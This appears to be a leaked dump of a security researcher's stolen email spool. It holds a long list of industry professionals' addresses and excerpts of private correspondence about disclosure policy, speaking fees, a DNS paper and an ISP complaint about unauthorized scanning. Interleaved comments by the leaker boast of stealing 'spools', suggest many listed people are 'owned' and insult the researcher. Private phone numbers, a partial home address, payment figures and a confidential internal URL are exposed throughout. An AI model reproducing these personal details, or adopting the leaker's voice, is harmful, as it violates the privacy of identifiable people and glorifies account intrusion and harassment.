        jedhaile@gmail.com, frank@ccc.de, dave@mu.org, jwilkins@bitland.net,
        kf@gnosys.biz, Jordan Ritter <jpr5@darkridge.com>,
        matthew_conover@symantec.com, thegnome@nmrc.org, ofir@sys-security.com,
        provos@umich.edu, silvio@big.net.au, mike_schiffman@hotmail.com,
        niness@devilness.org, of@securityfocus.com, alan@silent5.com,
        mark@stateful.net, weingart@tepid.org, kyxspam@loder.us,
        Todd.Miller@courtesan.com, hlein@progressive-comp.com,
        neel_mehta@iss.com, shaun@securereality.com.au,
        "Felix 'FX' Lindner" <fx@recurity-labs.com>, thegrugq@gmail.com,
        jose@monkey.org, dan@doxpara.com, caddis@ruxcon.org.au,
        mudge@uidzero.org, Gerardo Richarte <gera@corest.com>,
        mike@datanerds.net, mike@digitalguardian.net,
        Robert Lemos <mail@robertlemos.com>, Ejovi Nuwere <ejovi@ejovi.net>,
        watcher@vigilans.net, tobyhush@hushmail.com, arrigo@alchemistowl.org,
        oudot@rstack.org, f.raynal@miscmag.com,
        Philippe Biondi <phil@secdev.org>, Cedric Blancher <sid@rstack.org>,
        gary@proventsure.com, kostya@immunitysec.com,
        ol at uncon <ol@uncon.org>, itojun@itojun.org, rakan@well.com,
        ETOH@jp.ibm.com, joewee@monkey.org, n.brulez@free.fr, djm@intrusec.com,
        george.kurtz@foundstone.com, paulwatson@paulwatson.org,
        danny@arbor.net, keith@netwerked.net, craig.balding@gecapital.com,
        dave@immunitysec.com, dmaynor@gmail.com, rforno@infowarrior.org,
        kevin@labmistress.com, Ryan Mcbride <mcbride@openbsd.org>,
        Josh <josh.pennell@ioactive.com>, jcouzens@6o4.ca,
        athomas@deltacable.com, RSalgado@att.net,
        Christopher Owen <chris.owen@consault.com>, yukai@eeye.com,
        Joel_Carter@bcit.ca, Joost.Houwen@accenturebizservicesbc.com,
        ws@dec.net, schneier@counterpane.com, mark@4mtu.net,
        arno@ed-diamond.com, anton@chuvakin.org, takahashi.akiko@scs.co.jp,
        gaus@cisco.com, job@itsx.com, bmccarty@apu.edu, eric_byres@bcit.ca,
        c.uchida@ie.sumitomocorp.co.jp, kjc@iijlab.net, djm@cambia.com,
        adam@philtered.net, kasahara.ken@scs.co.jp,
        Dino Dai Zovi <ddz@theta44.org>, dmckay@gmail.com, ebalas@iu.edu,
        thorsten.holz@mmweg.rwth-aachen.de, alexbling@gmail.com,
        barnaby.jack@gmail.com, cesar@appsecinc.com, gael@melix.net,
        spoonm@gmail.com, mschiffm@cisco.com, fernando@gont.com.ar,
        npouvesle@tenablesecurity.com, zoe.g@cansecwest.com,
        jkouns@infosecmba.net, jericho@attrition.org, mail@mtrueman.com,
        rob <rob@robmann.org>, yuzu@yuzuko.net, justine.aitel@immunitysec.com,
        javier@corest.com, sinan.eren@immunitysec.com, nicolas@immunitysec.com,
        mwatchinski@sourcefire.com, sunshine@pacsec.jp,
        saito@byakuya-net.co.jp, chwieser@ee.oulu.fi, lcars@gentoo.org,
        vh@thc.org, ilja@netric.org, hiroshi_shinotsuka@symantec.com,
        cjordan@endeavorsystems.net, Sowhat <isowhat@gmail.com>,
        mdornseif@mac.com, josh.ryder@ualberta.ca, glovet@fortinet.com,
        marc_bevand@rapid7.com, zoe.g@eusecwest.com, scomeau@eusecwest.com,
        mock@eusecwest.com, martin.herfurt@trifinite.org, marcel@holtmann.org,
        tim.hurman@pentest.co.uk, deleskie@gmail.com, yuz@p0c.net,
        raffy@raffy.ch, andy.davis@irmplc.com,
        frederic.raynal@security-labs.org, shreeraj@net-square.com,
        aquynh@gmail.com, Carlos Sarraute <carlos@coresecurity.com>,
        jburroni@coresecurity.com, michael.boman@gmail.com,
        Andrea Barisani <andrea@inversepath.com>, andrewcu@microsoft.com,
        cat@reptiles.org, Chris Ulliott <chris@ulliott.com>,
        nikoteen@zetetique.info, ofir.arkin@insightix.com, bnagy@eeye.com,
        jim.deleskie@vsnlinternational.com, nick.murison@foundstone.com,
        Josh Ryder <josh.ryder@gmail.com>, crispin@crispincowan.com,
        steve@buyukada.co.uk, dbugman@dbugman.com, sascha@rommelfangen.de,
        fred <fred@thinkingsecure.com>, dendler@tippingpoint.com,
        davidendler@hotmail.com, mreavey@microsoft.com, terri_forslof@3com.com,
        Alexander Sotirov <alex@sotirov.net>, alex@isecpartners.com,
        scott@isecpartners.com, thalheim@informatik.hu-berlin.de,
        aempirei@the-mathclub.net, loic.duflot@sgdn.pm.gouv.fr,
        hscholz@raisdorf.net, hdm@metasploit.com, Dragos Ruiu <dr@kyx.net>,
        adam.laurie@thebunker.net, dcox@breakingpointsystems.com,
        tqbf@matasano.com, joanna@invisiblethings.com, change@dmzs.com,
        doug@hcsw.org, erik@specialopssecurity.com, marnone@fcw.com,
        hfortier@recon.cx, elisa@jasinska.de, raoul.chiesa@mediaservice.net,
        d.sacher@gmail.com, niels.bakker@ams-ix.net,
        Jhayne <bloodkrystal@hotmail.com>, riojh@mac.com,
        Sarah Blankinship <sarahbl@microsoft.com>,
        andrewcu@windows.microsoft.com,
        Marc Schoenefeld <marc.schoenefeld@gmx.org>, mconover@gmail.com,
        starbug@berlin.ccc.de, sandipchaudhari@gmail.com,
        philippe.lagadec@laposte.net,
        Ariel Waissbein <ariel.waissbein@coresecurity.com>,
        arnaud.ebalard@eads.net, guedou@hongo.wide.ad.jp,
        johns@informatik.uni-hamburg.de, chenym@gmail.com,
        ychen@foundstone.com, yuriko@pacsec.jp, jesssa@pacsec.jp,
        hilary@pacsec.jp, helen@pacsec.jp, sono@pacsec.jp,
        Ryo Hirosawa <ryo@pacsec.jp>, nrb@pacsec.jp, aboladeg@microsoft.com,
        adamo@microsoft.com, jwill@microsoft.com, takumio@microsoft.com,
        Youji Okuten <youjio@microsoft.com>, ishikawa.mitsuharu@scs.co.jp,
        kanbe.tsuyoshi@scs.co.jp, iwai@lac.co.jp,
        katsuya.furukawa@microsoft.com, trombik@gentoo.gr.jp,
        rwood@coverity.com, alex.lucas@microsoft.com,
        Mark Dowd <mark.dowd@gmail.com>, azanatta@spiritcommunications.ca,
        Dean Turner <dean_turner@symantec.com>,
        Oliver Friedrichs <oliver_friedrichs@symantec.com>, taviso@google.com,
        Steve Manzuik <smanzuik@juniper.net>, cjaue@atic.ca,
        mountainbarn@gmail.com, vrc_founder@hotmail.com, baiyilang@sina.com,
        calvin.wong@intel.com, lmiras@gmail.com, dave@cansecwest.com,
        richard.chadderton@hsbc.ca, "A. R." <r00t@northernfortress.net>,
        ggalford@microsoft.com, njam@sandia.gov, christian.wieser@oulu.fi,
        dtrammell@dustintrammell.com, druid@caughq.org,
        dtrammell@tippingpoint.com, Jim.Deleskie@vsnlinternational.com,
        matteo.meucci@owasp.org, matteo.meucci@gmail.com,
        David Watson <david@honeynet.org.uk>, markruss@microsoft.com,
        Saumil Shah <saumil@net-square.com>, sweetlie@etri.re.kr,
        richardg@esentire.com, eldons@esentire.com, tvidas@nucia.unomaha.edu,
        danbia@infis.units.it, msutton@spidynamics.com,
        roelof.temmingh@gmail.com, V Anil Kumar <anil@cmmacs.ernet.in>,
        tvidas@gmail.com, michael.geide@us-cert.gov, troglocan@gmail.com,
        joshua.lackey@microsoft.com, Aaron Portnoy <aportnoy@tippingpoint.com>,
        heavywizardry@gmail.com, nathan.green@ge.com,
        El Nahual <nahual@0hday.org>, Danny McPherson <danny@tcb.net>,
        aavivi@juniper.net, Gadi Evron <ge@linuxbox.org>,
        jim_hoagland@symantec.com, mdfranz@gmail.com, pavel_haintz@shaw.ca,
        felix@fefe.de, julia@devcon.net, jeedi@ccc.de, david@scanit.net,
        job@riscure.com, renaudb@radware.com, carrier@digitalevidence.org,
        frank@leviathansecurity.com, infosecdr@hoagland.org,
        William Knowles <wk@c4i.org>, franck.veysset@orange-ftgroup.com,
        nicolas.vivant@free.fr, jwalker@tgmp6.hbs.edu, lcamtuf@dione.ids.pl,
        Peter Evans <peter@ixp.jp>, robert_mcmillan@idg.com,
        mike@leviathansecurity.com, Michael Eddington <meddington@gmail.com>,
        hiroshi.kawaguchi@lac.co.jp, mh@baseline-security.de,
        haradats@nttdata.co.jp, itojun.hagino@gmail.com, arice@websense.com,
        nruff@security-labs.org, fruss@coresecurity.com,
        diegobt@coresecurity.com, nicolas.waisman@immunityinc.com,
        Colin_Delaney@mcafee.com, stephen@blackroses.com, fabienne@fabienne.us,
        rich cannings <rcannings@gmail.com>, nohl@virginia.edu, jmcd@pobox.com,
        rhensing@microsoft.com, Oded Horovitz <odedh@vmware.com>,
        Thierry Zoller <Thierry.Zoller@nruns.com>, sergio.alvarez@nruns.com,
        SunBing <taoshaixiaoyao@hotmail.com>,
        Sebastien Tricaud <stricaud@inl.fr>, p.chifflier@inl.fr,
        Dan <dhubbard@websense.com>, schenette@websense.com,
        olleB@toolcrypt.org, Charles Miller <cmiller@securityevaluators.com>,
        Adam Stein <astein@musecurity.com>, dan@jwsecure.com,
        my.self@erichacker.com, andres.riancho@gmail.com, slarson@strozllc.com,
        Cappella <cappella@mail.com>, jf <jf@ownco.net>, rmarty@splunk.com,
        Hernan Ochoa <hochoa@coresecurity.com>,
        Harri Hursti <hursti@hursti.net>, dpalacio@purdue.edu,
        daniel@immunityinc.com, Aaron_Portnoy@3com.com,
        arizvisa@tippingpoint.com, Hendrik Scholz <hs@123.org>,
        Julien Vanegue <jfv@cesar.org.br>,
        Jose Orlicki <jorlicki@coresecurity.com>,
        Thomas Lim <thomas@coseinc.com>

/* God damn that's a lot of names we recognize. That's the center of the
* whitehat world. In the undergrond we stay on top of these guys by stealing
* spools of people like Dan Kaminsky. We follow more exclusive mailing lists too,
* but all of them are pretty worthless anyways. Kids, know your history: read
* ~el8 and h0no to see whitehats exposed via their spools.
*
* I bet lots of those are owned.
*
* :-D
*
* There's this little thing too, it's funny when whitehats try to tier */

From: Ivan Arce <ivan.arce@coresecurity.com>
Organization: CORE Security Technologies
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Aviram Jenik <aviram@beyondsecurity.com>
CC: "Steven M. Christey" <coley@linus.mitre.org>, Gadi Evron <ge@linuxbox.org>,
        "Steven M. Christey" <coley@mitre.org>,
        Noam Rathaus <noamr@beyondsecurity.com>, Michael Lynn <mtlynn@mac.com>,
        Matthew Murphy <mattmurphy@kc.rr.com>, Halvar Flake <halvar@gmx.de>,
        Matthew Franz <franz@digitalbond.com>,
        John Cartwright <johnc@grok.org.uk>, Fyodor <fyodor@insecure.org>,
        mudge@uidzero.org, Dan Kaminsky <dan@doxpara.com>,
        raven@oneeyedcrow.net, Ilfak Guilfanov <ig@datarescue.be>,
        Paul Vixie <vixie@vix.com>, Joe Stewart <jstewart@lurhq.com>,
        David Litchfield <davidl@ngssoftware.com>,
        Ivan Arce <iarce@coresecurity.com>
Subject: Re: SRG: Vulnerability reporting service
References: <43E41C15.8060007@linuxbox.org> <Pine.GSO.4.51.0602060157350.16000@cairo.mitre.org> <200602061728.34156.aviram@beyondsecurity.com>
In-Reply-To: <200602061728.34156.aviram@beyondsecurity.com>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on mail.pmjm.net
X-Spam-Level:
X-Spam-Status: No, score=-0.0 required=2.0 tests=SPF_HELO_PASS,SPF_PASS
    autolearn=failed version=3.0.4
Content-Length: 7460
Status: O
X-Status:
X-Keywords:
X-UID: 869

Hi all,

Gadi, thanks for kick-starting this and for framing the discussion.

Although many of us know each other and are aware of what the others do,
as a general rule I think I'd be good if we all introduce ourselves so
we know who we are and how or why we ended up bound by Gadi's email.

Ok, so I'll start by introducing myself :)

I'm CTO of Core security Technologies and I've been working in the
infosec field since the early 90s. I've been personally involved in the
 discovery and reporting process of every bug that Core discovered
and/or reported since around 1994. So far, I have not actively
participated in any of the various incarnations of the never ending
'disclosure debate' that has been ranging since the spread of RTM worm
(or possibly even before). Nonetheless I am intimately familiar with
both the public and private details of the research and disclosure process.

Lately I've noticed that there is a marked trend towards controlling
and/or regulating the mechanics of the security research process and one
of its sub-processes, the disclosure process. This trend, actively
pursued by a set of interested players, mainly big commercial software
and security vendors, has reached a point were a specific (and I'd
venture to say not unbiased) view of things is presented as the only
legitimate way of conducting security research. Meanwhile the
individuals and organzations that do the actual research and generate
the raw material that is often subject to these raging debates said very
little about the topic.

In my view, this was to be expected, as security
researchers/practitioners are generally more focused on getting their
hands dirty and *getting things done* rather than *talking about*
how/when or why to do them. Nonetheless several individual researchers
or research organization have presented their views on the topic but
generally in a scattered and very fragmented manner that did not reflect
the existence of a cohesive collective mindset with an alternative
approach to the security research practice. However, I believe (actually
I *know*) that a collective mindset does exist and that in  fact it is
one of the very specific things that fostered the development of the
infosec community and particularly infosec industry for at least 15
years. Security researchers have not yet expressed their opinion and
presented their views in an organized manner and I believe it is time
for them (us?) to do it. It is a necessary step if we want to continue
fostering the evolution and maturity of the discipline rather than
allowing it to fall into a renewed cycle of obscurantism.

Ok, but aside from the security research community diatribe and most
importantly: As far as I know the end-user community has not (directly)
expressed their opinion and has not provided guidance on how things
should be done or what is the expected/desired outcome for the future
evolution of security research and disclosure process. After all the
end-user community is the one stakeholder with the most at risk, it is
end-user organzations and individuals (not vendors nor researchers) that
are affected by security bugs and ultimately reponsible for fixing them
and so far they hear just one loud voice that allegedly explains how
things should be done in the field.

I submit that if there is only one choice, that's the one users will
adopt not because it is the right one but because it is the only one
available. My intend is to foster the emergence of at least one more
voice that can articulate and synthesize into understandable and
plausibly adoptable end-user options the various forms of security
research and disclosure processes that both fostered and fed from the
infosec industry during the last 15 years.

I've expressed many of these thoughts to Aviram and a few others [1]
during the past months and, gladly, I found out that (give or take a few
things) we were all having similar thoughts and the intention to do
something about it.

I guess that explains how I ended up in the TO: header of Gadi's
original email.


-ivan

[1] Besides internal discussion at Core, I talked about this topic with
Tom Ptacek (tqbf@matasano.com) and Nate Lawson (nate@root.org). I think
both of them would be interested in joining the list.


.... etc etc

~~~~~


// And just because every set of leaked mails needs one from Theo..


From deraadt@cvs.openbsd.org  Sun Feb 24 15:58:30 2008
Return-Path: <deraadt@cvs.openbsd.org>
X-Spam-Checker-Version: SpamAssassin 3.1.5 (2006-08-29) on pmjm.com
X-Spam-Level: 
X-Spam-Status: No, score=-1.2 required=2.0 tests=AWL,BAYES_00,
        DNS_FROM_RFC_ABUSE autolearn=no version=3.1.5
Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3])
        by pmjm.com (8.13.8/8.13.8) with ESMTP id m1ONwUBE016201
        for <dan@doxpara.com>; Sun, 24 Feb 2008 15:58:30 -0800 (PST)
        (envelope-from deraadt@cvs.openbsd.org)
Received: from cvs.openbsd.org (localhost [127.0.0.1])
        by cvs.openbsd.org (8.14.1/8.12.1) with ESMTP id m1ONx6gk031802
        for <dan@doxpara.com>; Sun, 24 Feb 2008 16:59:06 -0700 (MST)
Message-Id: <200802242359.m1ONx6gk031802@cvs.openbsd.org>
To: Dan Kaminsky <dan@doxpara.com>
Subject: Re: DNS Client 
In-reply-to: Your message of "Sun, 24 Feb 2008 14:48:35 PST."
             <47C1F443.8030605@doxpara.com> 
Date: Sun, 24 Feb 2008 16:59:06 -0700
From: Theo de Raadt <deraadt@cvs.openbsd.org>
Status: RO
X-Status: A
X-Keywords:
X-UID: 106100

>     Gimme a call tomorrow (Monday) evening, if you get a chance.
> +1-408-933-8195.  Got a heads up for ya.

I'm swamped making a release.

No matter what happens, if this is anything about ID's it will hurt us
less than it hurts the people who still believe in ID++, which is most
of the vendors.

~~~~~~


* mudge (mudge@uidzero.org) [060120 20:04]:
> 
> Actually, this advisory is missing some important information.  
> bugtraq engaged in this prior to the "buy out". Security Focus  
> engaged in this practice as well where there were some advisories  
> that would go out only to the Security Focus paid private list and  
> not be forwarded to the public list to which they were posted.

Excuse me, but wtf are you talking about? No offense mudge, (well, no
more than you just offended us), but maybe you should get back on the
meds.

We never have delayed any message to Bugtraq so as to give our paying
customers any advance notice. While there could have been situations where 
something may have gone out first to customers of our alerting service
(e.g. an analyst find about the vuln through a medium other than bugtraq
before it hits bugtraq), it was never a result of a moderator delaying
a message for competitive advantage.

I find your comments particularly galling given that you were one of
the few people we allowed to post to Bugtraq without going through
moderation.

Maybe we should discuss some of the vulns @stake discovered that were
never made public. Hmm?

-- 
Elias Levy
Symantec


//~~~~ Look at the state of secdev!

From: Mike Schiffman <mschiffm@cisco.com>
Subject: Re: DNS deluge for x.p.ctrc.cc
Date: Wed, 1 Mar 2006 12:52:18 -0800
To: dan@doxpara.com
X-Mailer: Apple Mail (2.746.2)
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on mail.pmjm.net
X-Spam-Level: 
X-Spam-Status: No, score=0.4 required=2.0 tests=DNS_FROM_RFC_ABUSE,
        SPF_HELO_PASS,SPF_PASS autolearn=no version=3.0.4
Content-Length: 3118
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 1541

Hey dude, I'm finally working on endgame for my paper... I'm  
collating all of the DNS IPs, BIND version numbers, BIND  
vulnerabilities and CVSS scores. I'm translating into LAT/LONG using  
ipgeo. What software did you use to plot your stuff on those pretty  
globes?

--
Mike Schiffman, CISSP
Audentis fortuna iuvat
Cisco Systems, Inc Critical Infrastructure Assurance Group


//~~~ Dan and Mike trade pictures ;p


From: Mike Schiffman <mschiffm@cisco.com>
Subject: DNS!
Date: Thu, 20 Apr 2006 11:26:52 -0700
X-Mailer: Apple Mail (2.746.3)
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on mail.pmjm.net
X-Spam-Level: 
X-Spam-Status: No, score=0.4 required=2.0 tests=AWL,DNS_FROM_RFC_ABUSE,
        SPF_HELO_PASS,SPF_PASS autolearn=no version=3.0.4
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 2845

hey dude... check out the slowest paper ever written that's still not  
done yet, and let's build a partiview mpeg of the globe! That's the  
one thing I lack. http://www.packetfactory.net/papers/DNS-2006 and  
PLEASE DONT GIVE OUT OR I WILL GET FIRED: http:// 
www.packetfactory.net/papers/DNS-2006/CIAG-ONLY/. Call me!  
415-572-6014...


--
Mike Schiffman, CISSP
Audentis fortuna iuvat
Cisco Systems, Inc Critical Infrastructure Assurance Group

//~~~~~~ lol


From: Mike Schiffman <mschiffm@cisco.com>
Subject: hey
Date: Tue, 2 May 2006 15:48:58 -0700
To: Dan Kaminsky <dan@doxpara.com>
X-Mailer: Apple Mail (2.749.3)
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on mail.pmjm.net
X-Spam-Level: 
X-Spam-Status: No, score=0.4 required=2.0 tests=AWL,DNS_FROM_RFC_ABUSE,
        SPF_HELO_PASS,SPF_PASS autolearn=no version=3.0.4
Status: RO
X-Status: A
X-Keywords:                
X-UID: 3130

You still out there? Am I bugging you with my constant badgering for  
assistance in wrapping this paper up? :)

//~~~~~ I only hope you had better people to go to back in the day...


From: Fyodor <fyodor@insecure.org>
To: Dan Kaminsky <dan@doxpara.com>
Subject: Re: yo
Message-ID: <20081006090609.GJ6077@syn.lnxnet.net>
References: <4896633E.1030402@doxpara.com> 
<20080804043740.GC3447@syn.lnxnet.net> <48968878.1000604@doxpara.com> 
<20080804050415.GA10530@syn.lnxnet.net> <48969021.9080007@doxpara.com
>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <48969021.9080007@doxpara.com>
User-Agent: Mutt/1.5.9i
X-UID: 122512
Status: RO
X-Keywords: $Label4                                                  
Content-Length: 2477

Hi Dan.  On your blog I noticed that you wrote:

> Now, there?s Robert E. Lee and Jack Louis with their TCP Denial of
> Service attacks. Now, it?s a bit silly to assume Jack Louis doesn?t
> know the history of TCP attacks, as it?s silly to assume I don?t know
> the history of DNS attacks. (You?d be amazed how many people thought
> I?d just reinvented the birthday attack.) Jack?s written more crazy
> TCP code than you have, for all values of you including me and
> possibly Fyodor. Do their attacks work, mostly as they?re saying?
> Almost certainly. There?s dozens of weird corner cases in TCP where
> resources and timers are allocated. It?s entirely feasible that at
> least some of them have nasty effects on the system above and beyond
> three way handshake flood.

How well do you know these fellows?  I had been inclined to give them
the benefit of the doubt too, but I'm not impressed that the few parts
where they have divulged details have been so sketchy.  For example, I
just found their SEC-T slides on Sockstress and noted a number of
glaring technical problems:

http://seclists.org/nmap-dev/2008/q4/0084.html
If you click "next in thread" you can see Robert's response, which
skipped over all the technical problems in their slides and resorted
to answers like "those slides don't actually describe any of the
vulnerabilities that we're alarmed about" and "we see no compelling
reason to appease the internet security research community as a whole
with full disclosure details."  Sounds like a cop-out to me.

Also, their claim that there are no known workarounds or fixes is
questionable.  Even CERT-FI examined their research and reported that
"based on our evaluation, the vulnerability can be mitigated by source
address level filtering."  In other words, we can deal with it the
same way we deal with all the other non-spoofed DoS attacks on a daily
basis.

Mark my words: I expect that for their presentation on the 17th, they
will claim it is still too dangerous to give out details and spread
more FUD instead.  Even though they still have a tell-all talk
description.

I do agree with you that they probably did find some DoS attacks you
can perpetuate when you have hundreds or thousands of open TCP
connections.  In my experience, you don't have to try very hard to
cause major DoS incidents that way.

Anyway, I'll stop ranting now :).  I hope all is well with you and
that you're having a great time in Japan!

Cheers,
-F

From lance@spitzner.net  Sat Sep 13 11:59:15 2008
Return-Path: <lance@spitzner.net>
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on pmjm.com
X-Spam-Level: 
X-Spam-Status: No, score=-1.0 required=2.0 
tests=BAYES_00,DNS_FROM_RFC_BOGUSMX,
        RDNS_DYNAMIC autolearn=no version=3.2.5
Received: from www.honeytech.com (69-64-87-215.dedicated.abac.net 
[69.64.87.215])
        by pmjm.com (8.14.2/8.14.2) with ESMTP id m8DIxFSs072264
        for <dan@doxpara.com>; Sat, 13 Sep 2008 11:59:15 -0700 (PDT)
        (envelope-from lance@spitzner.net)
Received: from [192.168.1.235] (unknown [70.91.102.18])
        by www.honeytech.com (Postfix) with ESMTP id 220011340123
        for <dan@doxpara.com>; Sat, 13 Sep 2008 13:58:43 -0500 (CDT)
Message-Id: <8531C828-C315-4DD1-B558-BCB799AE5525@spitzner.net>
From: Lance Spitzner <lance@spitzner.net>
To: Dan Kaminsky <dan@doxpara.com>
In-Reply-To: <48CC0C92.3030807@doxpara.com>
Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0 (Apple Message framework v926)
Subject: Re: Ping
Date: Sat, 13 Sep 2008 13:59:42 -0500
References: <34C68BDE-0B94-434B-A2A5-E65EC82BFCA0@spitzner.net> 
<48C57ADD.5070101@doxpara.com> 
<63192BFF-681E-468E-AA42-1F31133CB211@spitzner.net> 
<48CC0C92.3030807@doxpara.com>
X-Mailer: Apple Mail (2.926)
Status: RO
X-Status: 
X-Keywords: $Label4         
X-UID: 121071


On Sep 13, 2008, at 13:55, Dan Kaminsky wrote:

> Ah, I'd love to make it out.  I hate to ask, but do these guys have  
> much
> budget?  I'd have to take a week off of a consulting gig to do this
> talk, and that'd be pretty rough :(

Hey Dan!  Normally they don't pay speakers.  However, for keynotes  
(and you) I am sure they would make an exception. Howard Schmidt is  
presenting, I'm sure he is not free :)
They do not pay me but that is because I am very good friends with  
them, I have known them for years and we help each other out in other  
ways.  What other information can I provide for you?  What other  
questions do you have?  Where would you like to go from here?  If you  
like I can do intros with the head guy Ahmad Kamali and you guys can  
take it from there.  Ahmad is the friendliest Emirati (and friendliest  
Arab) I have met in my five years of travelling to the middle-east.

Let me know what you would like to do next, thanks!

lance


From ping@blackhat.com  Mon Sep  8 13:30:17 2008
Return-Path: <ping@blackhat.com>
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on pmjm.com
X-Spam-Level: 
X-Spam-Status: No, score=-0.8 required=2.0 tests=AWL,BAYES_00,
        DNS_FROM_OPENWHOIS autolearn=no version=3.2.5
Received: from colossus.blackhat.com (colossus.blackhat.com 
[216.231.63.50])
        by pmjm.com (8.14.2/8.14.2) with ESMTP id m88KUGiQ002397
        for <dan@doxpara.com>; Mon, 8 Sep 2008 13:30:16 -0700 (PDT)
        (envelope-from ping@blackhat.com)
Cc: Jeff Moss <jmoss@blackhat.com>
Message-Id: <200809082030.m88KUhTR069073@colossus.blackhat.com>
From: Ping Look <ping@blackhat.com>
To: Dan Kaminsky <dan@doxpara.com>
In-Reply-To: <48C580B5.2020906@doxpara.com>
Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0 (Apple Message framework v919.2)
Subject: Re: Japan
Date: Mon, 8 Sep 2008 13:32:01 -0700
References: <48C580B5.2020906@doxpara.com>
X-Mailer: Apple Mail (2.919.2)
Content-Length: 2553
Status: RO
X-Status: A
X-Keywords:                
X-UID: 120768

Dan

I know you just spoke with Jeff and this is what we can do at the  
moment:
I will get you paid $3K from US 08
$2K from JP 08

So you'll get at least two separate payments in 2008.

And if you speak at DC and EU and USA 09, we'll increase appropriately  
to make up the shortfall (up to $6K).

Are you still on Boylston in #204?

I'll send you another note for Travel...

Thx so much... your karma thanks you.

On Sep 8, 2008, at 12:44 PM, Dan Kaminsky wrote:

> OK, here's the deal.
>
> You notice how I always do BH USA, but don't do too many other cons
> every year that are during weekdays?
>
> That's because there's no subsidization.  I do a weekday con, it  
> means I
> have to forgo consulting revenue for that day.  That's the deal I  
> have,
> and it's why I *can* choose to go to any con I select.  It's out of  
> my hide.
>
> Black Hat this year was about a month of no work.  I'd do it again  
> in a
> heartbeat :)  But that's what it was.
>
> So.  You want me at Black Hat Japan -- I'll do it, whether or not you
> have budget to handle my standard honorarium, which for international
> travel with three work days lost is $12,000.  I'll do it even if you
> don't have budget to handle my out-of-pocket lost revenue, which is
> $8K.  That's not an offer I'd extend to anyone else, but you've been
> good to me for a decade, and you clearly want me in Japan.  So I'll
> attend, on whatever terms you can afford.
>
> --Dan
>

// What a fucking whitehat whore. It's not over:

From Brian@sector.ca  Mon Sep  8 16:35:17 2008
Return-Path: <Brian@sector.ca>
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on pmjm.com
X-Spam-Level: 
X-Spam-Status: No, score=-3.6 required=2.0 
tests=BAYES_00,RCVD_IN_DNSWL_LOW
        autolearn=ham version=3.2.5
Received: from mail.sector.ca (mail.cms.ca [66.241.135.194])
        by pmjm.com (8.14.2/8.14.2) with ESMTP id m88NZH9Z010196
        for <dan@doxpara.com>; Mon, 8 Sep 2008 16:35:17 -0700 (PDT)
        (envelope-from Brian@sector.ca)
Received: from BBLaptop ([76.66.137.239]) by mail.sector.ca over TLS 
secured cha
nnel with Microsoft SMTPSVC(6.0.3790.3959);
         Mon, 8 Sep 2008 19:35:44 -0400
Reply-To: <brian@sector.ca>
From: "Brian Bourne" <brian@sector.ca>
To: "'Dan Kaminsky'" <dan@doxpara.com>
References: <48BF0B77.9080608@doxpara.com> 
<022301c910ee$f6472b90$e2d582b0$@ca> 
<48C58DB1.1040204@doxpara.com>
In-Reply-To: <48C58DB1.1040204@doxpara.com>
Subject: RE: stand by
Date: Mon, 8 Sep 2008 19:35:42 -0400
Organization: Black Arts Illuminated Inc.
Message-ID: <011101c9120b$9bf78540$d3e68fc0$@ca>
MIME-Version: 1.0
Content-Type: text/plain;
        charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook 12.0
Thread-Index: AckR8x22X3Xx2dTQReuuubGuTm0oOAAGGdWA
:

Content-Language: en-us
X-OriginalArrivalTime: 08 Sep 2008 23:35:44.0271 (UTC) 
FILETIME=[9CE121F0:01C9120B]
Content-Length: 1080
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 120783

We just don't have $10k, but I'd still like to have you... we can fly 
you in
and out same day if you like... can you do $5k?

/bb

-----Original Message-----
From: Dan Kaminsky [mailto:dan@doxpara.com] 
Sent: Monday, September 08, 2008 4:40 PM
To: brian@sector.ca
Subject: Re: stand by

Brian--

    Alright.  I can make it out, but it'll cost $10K -- this isn't me
being a pain in the ass, it's that I literally have to walk away from a
consulting engagement for a few days and, unlike some people, that comes
out of my own pocket.  (Black Hat USA cost me about a month of
consulting revenue.)

    Let me know?

--Dan


Brian Bourne wrote:
> Dan,
>
> Can you call me when you have a second.  416-460-7317.  Here's the 
short
> version - you're a very entertaining speaker - if you want to come, 
rather
> than make other speakers compete with you, we'll give you a lunch 
keynote.
> Let me know ASAP.
>
> /bb
>
> -----Original Message-----
> From: Dan Kaminsky [mailto:dan@doxpara.com] 
> Sent: Wednesday, September 03, 2008 6:11 PM
> To: Brian Bourne
> Subject: stand by
>
>
>   

// Best buddies forever
arachne: Aww, you sound exhausted, hon...when was the last time you slept?


!~~~~
Here is another range you should not scan

205.144.96.0/20

This client has not asked for your "services"=20

Please cease your "tests"


R Grant Leonard=20
Technical Security Specialist
AT&T | Managed Security Services
Threat Management | MIDS | DDoS | Internet Protect | Analysis
rgleonard@att.com <mailto:rgleonard@ems.att.com>  | O 919-474-1147 | C =
919-949-4002
~~~~~


Dan,

This is another of our clients and you do not have the permission of the =
client to perform this kind of scanning.

You have triggered over 22,000 events for us in this range alone as well =
as caused a few other minor aggravations.

While you may believe you are a researcher and doing good, performing =
your unauthorized testing on live production platforms is a reportable =
offense.

I am going to kindly suggest you seek permission from various targets =
before you continue your "research".

Please note I am under contractual obligations to report your =
activities, we have recorded your "scans" on over 26 devices globally =
and none of our clients have given you permission to perform these =
"tests"


Thanks

R Grant Leonard=20
Technical Security Specialist
AT&T | Managed Security Services
Threat Management | MIDS | DDoS | Internet Protect | Analysis
rgleonard@att.com <mailto:rgleonard@ems.att.com>  | O 919-474-1147 | C =
919-949-4002

